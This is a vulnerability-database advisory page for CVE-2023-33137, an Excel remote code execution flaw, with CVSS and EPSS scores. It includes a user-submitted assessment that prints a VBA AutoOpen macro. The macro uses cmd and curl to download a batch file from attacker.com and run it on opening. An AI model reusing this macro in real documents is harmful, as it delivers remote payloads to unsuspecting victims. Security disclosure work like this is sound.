CVE-2023-33137

2023-06-1400:00:00

attackerkb.com

7.8 High

CVSS3

Attack Vector

LOCAL

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

4.4 Medium

CVSS2

Access Vector

LOCAL

Access Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:L/AC:M/Au:N/C:P/I:P/A:P

0.003 Low

EPSS

Percentile

66.0%

JSON

Microsoft Excel Remote Code Execution Vulnerability

Recent assessments:

nu11secur1ty at June 27, 2023 9:52am UTC reported:

Description:

This exploit is connected with third part exploit server, which waits for the victim to call him and execute the content from him using the pipe posting method! This is absolutely a 0-day exploit! This is absolutely dangerous for the victims, who are infected by him!
When the victim hit the button in the Excel file, it makes a POST request to the exploit server, and the server is responding back that way: He creates another hidden malicious file and executed it directly on the machine of the victim, then everything is disappeared, so nasty.

STATUS: HIGH Vulnerability WARNING: THIS IS VERY DANGER for the usual users!

[+]Exploit:

Sub AutoOpen()
  Call Shell("cmd.exe /S /c" & "curl -s https://attacker.com/nu11secur1ty/somwhere/ontheinternet/maloumnici.bat &gt; maloumnici.bat && .\maloumnici.bat", vbNormalFocus)
End Sub